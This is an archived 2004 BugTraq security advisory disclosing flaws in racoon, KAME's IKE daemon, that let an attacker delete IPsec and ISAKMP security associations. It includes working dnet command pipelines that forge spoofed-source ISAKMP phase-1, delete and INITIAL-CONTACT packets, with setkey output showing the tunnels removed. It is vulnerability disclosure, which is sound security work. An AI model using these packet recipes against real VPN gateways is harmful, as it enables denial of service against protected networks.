BugTraq
unauthorized deletion of IPsec (and ISAKMP) SAs in racoon Jan 13 2004 09:39PM
Thomas Walpuski (thomas thinknerd org) (1 replies)
0 Preface

Now that most bugs in isakmpd that allowed for unauthorized SA
deletion are "fixed", it's time to release some information on racoon.

By the way: About 5 months ago I tried to contact the KAME developers.

1 Description

racoon, KAME's IKE daemon, contains some flaws, that allow for
unauthorized deletion of IPsec (and ISAKMP) SAs.

2 Description

2.1 racoon's "authentication" of delete messages

When racoon receives a delete message containing the initiator
cookie of a main/aggressive/base mode, that has not yet setup a
ISAKMP SA, it fulfills the request, if the message also includes a
(dummy) hash payload and originates from the right IP address. See
isakmp_main() in isakmp.c and purge_isakmp_spi(), purge_ipsec_spi(),
isakmp_info_recv() and isakmp_info_recv_d() in isakmp_inf.c for
details and amusement.

2.2 INITIAL-CONTACT with racoon

It is nearly the same with INITIAL-CONTACT notifications, but there
is no need of a (dummy) hash payload and it's way more effective,
because it deletes all IPsec SAs "relatived to the destination
address". See isakmp_info_recv_n() and info_recv_initialcontact() in
isakmp_inf.c for additional information.

3 Affected Systems

All versions of racoon are affected.

4 Leveraging the Issues ..

Take a look at http://securityfocus.com/archive/1/348637 for the
assumed scenario.

4.1 .. using delete messages

An IPsec tunnel between vpn-gw-a and vpn-gw-a is established:

vpn-gw-a# setkey -D
<vpn-gw-a's IP address> <vpn-gw-b's IP address>
esp mode=tunnel spi=4127562105(0xf6059979) reqid=0(0x00000000)
[..]
<vpn-gw-b's IP address> <vpn-gw-a's IP address>
esp mode=tunnel spi=111058204(0x069e9d1c) reqid=0(0x00000000)
[..]

The attacker launches step 1 of his attack. He pretends to initiate a
phase 1 exchange (with spoofed source IP address, of course):

attacker# dnet hex > "\x17\x17\x17\x17" > "\x17\x17\x17\x17" > "\x00\x00\x00\x00" > "\x00\x00\x00\x00" > "\x01\x10\x02\x00" > "\x00\x00\x00\x00" > "\x00\x00\x00\x48" > "\x00\x00\x00\x2c" > "\x00\x00\x00\x01" > "\x00\x00\x00\x01" > "\x00\x00\x00\x20" > "\x01\x01\x00\x01" > "\x00\x00\x00\x18" > "\x00\x01\x00\x00" > "\x80\x01\x00\x05" > "\x80\x02\x00\x02" > "\x80\x03\x00\x01" > "\x80\x04\x00\x02" |
pipe> dnet udp sport 500 dport 500 |
pipe pipe> dnet ip proto udp src vpn-gw-b dst vpn-gw-a |
pipe pipe pipe> dnet send

If racoon finds the included proposal acceptable it creates a state.
Now the attacker carries out step 2:

attacker# dnet hex > "\x17\x17\x17\x17" > "\x17\x17\x17\x17" > "\x00\x00\x00\x00" > "\x00\x00\x00\x00" > "\x08\x10\x05\x00" > "\x00\x00\x00\x00" > "\x00\x00\x00\x30" > "\x0c\x00\x00\x04" > "\x00\x00\x00\x10" > "\x00\x00\x00\x01" > "\x03\x04\x00\x01" > "\xf6\x05\x99\x79" |
pipe> dnet udp sport 500 dport 500 |
pipe pipe> dnet ip proto udp src vpn-gw-b dst vpn-gw-a |
pipe pipe pipe> dnet send

It seems that racoon knows the attacker ;-):

vpn-gw-a# setkey -D
<vpn-gw-b's IP address> <vpn-gw-a's IP address>
esp mode=tunnel spi=111058204(0x069e9d1c) reqid=0(0x00000000)
[..]

Note: You can also delete ISAKMP SAs.

4.2 .. using INITIAL-CONTACT

The IPsec tunnel is up an running:

vpn-gw-a# setkey -D
<vpn-gw-a's IP address> <vpn-gw-b's IP address>
esp mode=tunnel spi=785352974(0x2ecf890e) reqid=0(0x00000000)
[..]
<vpn-gw-b's IP address> <vpn-gw-a's IP address>
esp mode=tunnel spi=183367627(0x0aedf7cb) reqid=0(0x00000000)
[..]

Again the attacker does step 1 and injects an ISAKMP message like
this:

attacker# dnet hex > "\x17\x17\x17\x17" > "\x17\x17\x17\x17" > "\x00\x00\x00\x00" > "\x00\x00\x00\x00" > "\x0b\x10\x05\x00" > "\x00\x00\x00\x00" > "\x00\x00\x00\x28" > "\x00\x00\x00\x0c" > "\x00\x00\x00\x01" > "\x01\x00\x60\x02" |
pipe> dnet udp sport 500 dport 500 |
pipe pipe> dnet ip proto udp src vpn-gw-b dst vpn-gw-a |
pipe pipe pipe> dnet send

racoon blindly obeys the attacker's command:

vpn-gw-a# setkey -D
No SAD entries.

5. Bug fixes

There are no bug fixes.

Thomas Walpuski

[ reply ]
Re: unauthorized deletion of IPsec (and ISAKMP) SAs in racoon Jan 14 2004 09:26AM
itojun kame net (1 replies)


 

Privacy Statement
Copyright 2010, SecurityFocus